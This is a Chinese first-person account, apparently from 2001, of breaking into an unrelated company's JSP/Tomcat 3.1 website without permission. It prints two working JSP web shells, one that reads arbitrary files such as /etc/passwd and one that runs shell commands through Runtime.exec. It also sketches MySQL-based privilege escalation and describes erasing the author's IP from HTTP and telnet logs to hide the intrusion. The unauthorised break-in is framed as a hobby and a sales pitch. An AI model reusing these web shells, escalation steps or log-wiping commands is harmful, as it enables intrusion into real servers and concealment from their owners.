入侵基于JSP+Tomcat的Web網站實錄

　　很偶然的一個機會，瀏覽到一個網站，頁面清新讓人感覺很舒服。網站是用JSP開發的，出于個人愛好，我決定測試一下其系統的安全性。

telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]

　　返回的結果如下：

HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404

＜h1＞Error: 404＜/h1＞
＜h2＞Location: /CHINANSL＜/h2＞File Not Found＜br＞/CHINANSL

　　獲得了運行的WEBServer的名稱“Tomcat 3.1”。記得曾經發現過這個版本的漏洞，并且post到bugtrap上去過。

　　回憶一下，大概是通過“..”技術可以退出WEB目錄，于是：

http://target:8080/../../../../%00.jsp （不行）
http://target:8080/file/index.jsp （不行）
http://target:8080/index.JSP （不行）
http://target:8080/index.jsp%81 （不行）
http://target:8080/index.js%70 （不行）
http://target:8080/index.jsp%2581 （不行）
http://target:8080/WEB-INF/ （不行）

　　看來安全狀況似乎還不錯，我們再來進行一下更深層的測試。Tomcat 3.1自帶了一個管理工具，可以查看WEB下的目錄及文件，并且可以添加context。于是嘗試：

http://target:8080/admin/

　　管理員果然沒有刪除或禁止訪問這個目錄，從安全的角度說，這點應該算是一個比較重要的失誤。

　　接著，點擊“VIEW ALL CONTEXT”按鈕，列出了WEB目錄下的一些文件和目錄的名稱，很快發現了一個上傳文件的組件，通過這個組件將一個JSP文件上傳到對方的WEB目錄里：

＜%@ page import="java.io.*" %＞
＜%
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try{
fis = new FileInputStream(file);
dis = new DataInputStream(fis);
while(true){
try{
str = dis.readLine();
}catch(Exception e){}
if(str == null)break;
out.print(str+"＜br＞");
}
}catch(IOException e){}
%＞

　　然后執行：

http://target:8080/upload/test.jsp?file=/etc/passwd

　　密碼出來了。接下來的過程是猜測密碼，沒有成功。不過，現在相當于有了一個SHELL，猜不出密碼可以先把IE當作SHELL環境。

　　再寫一個JSP文件：

＜%@ page import="java.io.*" %＞
＜%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%＞

　　然后把這個JSP再通過upload上傳，有SHELL了。

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
（詳細結果這里就不列出來了）

　　怎么獲得root權限呢？經過一番搜索發現系統安裝了MySQL，并且從JSP的源代碼中得到了MySQL的密碼，執行：

sqld"＞http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld

　　顯示：

root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql

　　系統是以root身份運行的MySQL。這時我思考了一下，既然知道了MySQL的密碼，那就可以寫一個SHELL程序，讓它創建一個表，然后將我的數據放到表中，再使用“select ... into outfile;”的辦法在系統上創建一個文件，讓用戶在執行su的時候，運行我的程序。（還記得apache.org有一次被入侵嗎？黑客就采用的這種辦法）。

　　之后就比較簡單了，上傳bindshell之類的程序，運行、獲得nobody的權限，使用su root時幫忙創建的setuid shell讓自己成為root。

　　但是，接下來已經實際操作，結果令人頗感意外：

http://target:8080/upload/cmd.jsp?cmd=id

　　顯示：

uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)

　　原來這個WEB SHELL本來就是ROOT！管理員的安全設置工作到底怎么做的？

http://target:8080/upload/cmd.jsp?cmd=ps+aux

　　果然是root身份運行的（不列出來了）

　　剩下的事情：

　　1、刪除我的telnet記錄。

　　2、刪除http的日志。

　　清除日志我使用的辦法是：cat xxx |grep -V "IP" ＞＞temp然后在把temp覆蓋那些被我修改過的日志文件。

　　說明一點，我沒有更換該網站的頁面，因為我只是個網絡安全愛好者。所以，發封郵件告訴system admin吧！當然，我順便在信中提到，如果需要安盟信息科技為他提供安全服務的話，我們會非常的高興！

原文轉自：http://www.anti-gravitydesign.com